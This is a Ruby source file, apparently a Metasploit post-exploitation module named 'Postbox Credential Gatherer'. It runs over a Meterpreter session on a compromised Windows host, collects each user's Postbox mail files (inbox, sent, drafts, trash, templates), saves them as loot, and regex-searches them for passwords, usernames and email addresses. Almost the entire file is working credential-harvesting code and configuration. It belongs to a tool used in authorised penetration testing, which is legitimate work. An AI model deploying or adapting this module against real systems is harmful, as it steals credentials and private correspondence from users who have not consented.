Files
metasploit-gs/modules/post/windows/gather/credentials/postbox.rb
T

355 lines
11 KiB
Ruby

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
include Msf::Post::File
include Msf::Post::Windows::UserProfiles
include Msf::Post::Windows::Packrat
ARTIFACTS =
{
application: 'postbox',
app_category: 'emails',
gatherable_artifacts: [
{
filetypes: 'received_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'INBOX',
description: "Postbox's received emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'sent_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'SENT*',
description: "Postbox's sent emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'email_logs',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: '*.msf',
description: "Postbox's email logs",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'email_logs',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Archive.msf',
description: "Postbox's Archive logs",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'email_logs',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Bulk Mail.msf',
description: "Postbox's junk emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'draft_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Draft.msf',
description: "Postbox's unsent emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'received_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'INBOX.msf',
description: "Postbox's received emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'sent_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Sent*.msf',
description: "Postbox's sent emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'sent_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Sent.msf',
description: "Postbox's sent emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'email_logs',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Templates.msf',
description: "Postbox's template emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
},
{
filetypes: 'deleted_emails',
path: 'AppData',
dir: 'PostboxApp',
artifact_file_name: 'Trash.msf',
description: "Postbox's Deleted emails",
credential_type: 'text',
regex_search: [
{
extraction_description: 'Searches for credentials (USERNAMES/PASSWORDS)',
extraction_type: 'credentials',
regex: [
'(?i-mx:password.*)',
'(?i-mx:username.*)'
]
},
{
extraction_description: 'searches for Email TO/FROM address',
extraction_type: 'Email addresses',
regex: [
'(?i-mx:to:.*)',
'(?i-mx:from:.*)'
]
}
]
}
]
}.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Postbox Credential Gatherer',
'Description' => %q{
This module searches for Postbox credentials on a Windows host.
},
'License' => MSF_LICENSE,
'Author' => [
'Kazuyoshi Maruta',
'Daniel Hallsworth',
'Barwar Salim M',
'Z. Cliffe Schreuders', # http://z.cliffe.schreuders.org
],
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [],
'SideEffects' => []
}
)
)
register_options(
[
OptRegexp.new('REGEX', [false, 'Match a regular expression', '^password']),
OptBool.new('STORE_LOOT', [false, 'Store artifacts into loot database', true]),
OptBool.new('EXTRACT_DATA', [false, 'Extract data and stores in a separate file', true]),
# enumerates the options based on the artifacts that are defined below
OptEnum.new('ARTIFACTS', [false, 'Type of artifacts to collect', 'All', ARTIFACTS[:gatherable_artifacts].map { |k| k[:filetypes] }.uniq.unshift('All')])
]
)
end
def run
print_status('Filtering based on these selections: ')
print_status("ARTIFACTS: #{datastore['ARTIFACTS'].capitalize}")
print_status("STORE_LOOT: #{datastore['STORE_LOOT']}")
print_status("EXTRACT_DATA: #{datastore['EXTRACT_DATA']}\n")
# used to grab files for each user on the remote host
grab_user_profiles.each do |userprofile|
run_packrat(userprofile, ARTIFACTS)
end
print_status 'PackRat credential sweep completed'
end
end